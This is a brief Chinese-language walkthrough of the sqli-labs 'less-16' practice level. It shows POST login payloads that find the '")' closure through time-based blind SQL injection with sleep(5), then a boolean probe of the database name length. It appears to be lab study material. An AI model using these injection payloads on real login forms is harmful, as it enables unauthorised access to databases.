sqli-labs (less-16)
进入16关,输入用户名和密码,可以看到没有数据回显
输入
uname=admin'&passwd=admin&submit=Submit #没有错误回显
uname=admin"&passwd=admin&submit=Submit #没有错误回显
没有错误回显,我们只能一个一个去猜闭合方式,利用时间盲注去判断注入点
uname=admin' and sleep(5)#&passwd=admin&submit=Submit #快速反应
uname=admin" and sleep(5)#&passwd=admin&submit=Submit #快速反应
uname=admin") and sleep(5)#&passwd=admin&submit=Submit #页面休眠5秒
判断这里闭合方式为"),并且为字符型注入
查看当前数据库长度
uname=ad") or length(database())=8#&passwd=admin&submit=Submit
依次类推猜解出所有的数据,具体过程看我的less-13